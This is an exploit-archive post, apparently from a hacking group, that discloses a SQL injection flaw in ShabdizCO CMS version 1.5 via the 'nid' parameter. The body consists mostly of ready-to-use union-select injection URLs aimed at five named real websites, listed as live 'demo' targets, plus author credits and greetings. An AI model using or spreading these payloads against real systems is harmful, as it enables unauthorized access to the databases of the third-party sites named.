ShabdizCO CMS SQL Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>ShabdizCO CMS SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : ShabdizCO CMS SQL Injection # Exploit Author : Persian Hack Team # Vendor Homepage : http://shabdiz.org/ # Date: 2016/05/02 # Category: [ Webapps ] # Tested on: [Win / php ] # Version : 1.5 ###################### # POC: # GET >> nid= SQLI # Demo: # http://www.clinicprestige.com/morenews.php?nid=-42944%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://www.mafk.ir/morenews.php?nid=-67424%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://heshmatian110.com/morenews.php?nid=-51798%20%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://www.pouyasazangroup.ir/morenews.php?nid=-51798%20%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://behinpayab.ir/morenews.php?nid=-51798%20%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # ###################### # Discovered by : Mojtaba MobhaM (<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="e08b819a858d898d8f8a94818281a08c899685ce838f8d">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>) # Greetz : T3NZOG4N & FireKernel And All Persian Hack Team Members # Homepage : persian-team.ir ###################### </BODY></HTML>